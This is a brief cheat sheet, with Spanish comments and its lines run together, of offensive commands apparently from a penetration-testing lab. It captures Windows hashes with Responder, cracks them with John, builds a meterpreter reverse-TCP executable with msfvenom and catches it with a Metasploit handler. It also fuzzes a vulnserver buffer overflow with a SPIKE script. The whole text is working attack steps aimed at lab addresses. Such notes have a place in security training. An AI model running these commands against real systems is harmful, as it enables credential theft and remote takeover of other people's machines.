sudo responder -I eth0 → capturar hash máquina W11 en txt → hash.txtjohn hash.txt → desencripta la contraseña del hashdocker run -d -p 80:80 reverse_shell_generatormsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exemsfconsole -q -x «use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit»getuidsudo python…vulnserver (buffer overflow tools)nc -nv 10.10.1.11 9999pluma stats.spk:s_readline(); s_string(“STATS ”); s_string_variable(“0”);
generic_send_tcp 10.10.1.11 9999 stats.spk 0 0